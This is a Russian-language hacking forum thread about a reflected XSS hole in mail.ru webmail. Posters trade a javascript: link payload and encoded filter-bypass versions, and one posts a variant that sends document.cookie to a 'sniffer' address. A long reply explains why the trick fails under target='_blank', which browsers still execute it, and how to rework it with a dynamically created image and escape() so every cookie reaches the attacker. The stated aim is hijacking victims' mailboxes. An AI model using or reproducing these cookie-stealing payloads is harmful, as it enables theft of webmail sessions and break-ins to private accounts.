![]() |
XSS на mail.ru
Только что нашел свежайшую XSS на mail.ru (пассивная):
<a href=javascript:alert('XSS')>Текст</a> |
|
У меня сработало... хз, ща проверю снова.
|
http://cskacrazyfan.data.bg/screen1.bmp
http://cskacrazyfan.data.bg/screen2.bmp Вот, все получается. :) |
Слушай,лутше кинь свою Xss не в зашифрованном виде
|
такое будет работать только в ИЕ, если мне не изменяет память.
|
проверил такую ссылку на локалхосте в опере-работает
|
Для того, чтобы оно работало, нужно отправлять письмо в HTML (да и то я не особо уверен, что фильтры не порежут)
В незашифрованном виде оно выглядит весьма банально: Код:
<a href=javascript:alert('XSS')>Текст</a> |
Все сработало на Ура!
|
в локалке сработало....на почте нет так как & заменилось на & посылал письмо в формате htm с того же mail.ru
|
2Skaret
Фишка то в том, чтоб обойти фильтр. В незашифрованном виде код такой: <a href=javascript:alert('XSS')>Текст</a> Но такой код не выполнится, поэтому нужен такой: <a href=javascript:alert('XSS')>Текст</a> :) |
плин мужики помогите заюзать багу )))) пишу след код и получаю глюк в Опере:
<a href=javascript:document.images[0].src='http://адрес сниффера/s.gif?'+document.cookie;>Текст</a> открывается новое окно и никаких куков, а если правой кнопкой мышары и открыть то куки выводятся прямо в браузере!!! помогите разобраться ) |
"мужики" все в Париже, а вот Я помогу тебе разобраться.
Начнем с того, что "багу" до сих пор еще не прикрыли, это свидетельствует о степени ее опасности. При том, что обычная пассивка на мыл ру, запощенная в этот раздел, держится дай бог неделю, косвенно можно предположить, какова цена этой "свежей" "баги" (с т.зр. саппорта через призму всех отписавшихся до меня :cool: ) . Так вот, почему ее не прикрыли... Потому что уже сравнительно давно переход по такой ссылке на мыл ру опосредуется принудительно вставляемым в тег ссылки атрибутом target c параметром "_blank". Это значит, что перед тем, как попасть в адресную строку (на выполнение), твой код javascript:document.images[0].src='http://адрес сниффера/s.gif?'+document.cookie; будет помещен на новую страницу. Это все равно что самостоятельно открыть новую страницу, вписать в адресную строку этот код и ждать прихода кук ! :confused: А алерты, конечно, пойдут! Только вот, видимо, очень плохо доходит инфа, что если где-то вдруг выскочил алерт, это не значит, что найдена бага XSS. :) В отличие от этого, когда ты нажимаешь правой кнопкой "открыть", браузер сам берет ссылку с псевдоскриптом и выполняет его непосредственно в контексте того домена, откуда ее взял. Атрибут target при этом игнорируется. Вот почему ты видишь свои куки в этом случае. Но в ИЕ это не проходит, а в ФФ ссылка правой кнопкой открывается только в новом окне. Остается из популярных только Опера. Теперь мы пойдем дальше и попробуем выжать из ситуации максимум :cool: Когда ссылка, нажатая обычным образом или через правую кнопку, открывается в новом окне, где нет никаких картинок, нет смысла обращаться к первой картинке на странице, используя document.images[0].src ! Заменям это обычным динамическим созданием объекта картинки: img=new Image(); img.src Далее, если посмотреть исходный код открывшейся страницы (при нажатии на ссылку обычным образом), там мы увидим, что на станице отобразилось все, что идет после src= , то есть адрес твоего сниффа. Используем это, вставляя на страницу код, отсылающий куки. XSS примет вид: PHP код:
- на голую страницу помещается тег img c адресом сниффера - но к этому адресу динамически прибавляются куки. Однако, куки разделены пробелами, в связи с чем может образоваться обрыв строки и на снифф отправится только первая кука. Мы снимаем эту проблему, преобразуя строку куки функцией escape (обратная - unescape(строка)). - и, наконец, закрываем тег img Обычным нажатием этот код будет работать только в ФФ. В Опере этот код сработает, только если открыть ссылку правой кнопкой. В ИЕ не сработает. Письмо отправлять в штмл не с маил ру. Посмотрим теперь, как быстро прикроют эту "багу". :D |
LeverOne, огромное тебе спасибо разобрался. к репе ++
|
а вот и баг прикрыли))
|
и сколько она всего прожила? :)
|
полюбому у них шахтёр капает на античате все дыры :) и закрывают потом их надо банить :d
|
Цитата:
|
этой багой год назад пытались мой ящик взломать, благо я всегда ява скрипты отрубаю
|
Обясните
Давайте вы мне подробнее раскажете:
Вот код: PHP код:
PHP код:
Вопрос № 2: Допустим если я как то найду xss на http://torg.mail.ru/ и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои? |
яое, ты круче всех чуваг.
|
Цитата:
|
| Время: 14:12 |